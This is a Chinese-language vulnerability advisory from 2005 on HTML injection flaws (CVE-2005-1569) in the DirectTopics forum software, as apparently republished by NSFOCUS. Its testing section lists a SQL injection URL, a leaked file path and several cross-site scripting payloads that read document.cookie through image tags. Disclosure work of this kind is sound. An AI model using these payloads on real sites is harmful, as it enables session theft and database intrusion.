首页 -> 安全研究

安全研究

安全漏洞
DirectTopics HTML注入漏洞

发布日期:2005-05-13
更新日期:2005-05-13

受影响系统:
DirectTopics DirectTopics DT 2final
DirectTopics DirectTopics DT 2beta
DirectTopics DirectTopics 2.2
DirectTopics DirectTopics 2.1
描述:
BUGTRAQ  ID: 13609
CVE(CAN) ID: CVE-2005-1569

DirectTopics是一款免费的论坛程序,适用于各种站点。

DirectTopics中存在HTML注入漏洞,攻击者可以利用这个漏洞执行跨站脚本或其他攻击。

起因是在动态生成的内容中使用用户输入前没有正确的验证这些输入。攻击者提供的HTML和脚本代码可以访问站点属性,可能导致窃取基于cookie的认证凭据。

<*来源:Morinex Eneco (m0r1n3x@gmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111592417803514&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

SQL注入:
http://example.com/topic.php?topic=669%B4SQL%20INJECTION

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result

完整路径泄漏:
/home/dis000414/domains/directtopics.nl/public_html/forum/topic.php on line 162

跨站脚本:
打开线程,张贴:
" javascript:alert(document.cookie) "

MD5哈希泄漏:
打开线程,张贴:

[img]javascript:alert(document.cookie)[/img] <img src=javascript:alert(document.cookie)>
[img]# onload=alert(document.cookie)[/img]   <img src=# onload=alert(document.cookie)>

建议:
厂商补丁:

DirectTopics
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.directtopics.nl/

浏览次数:2536
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障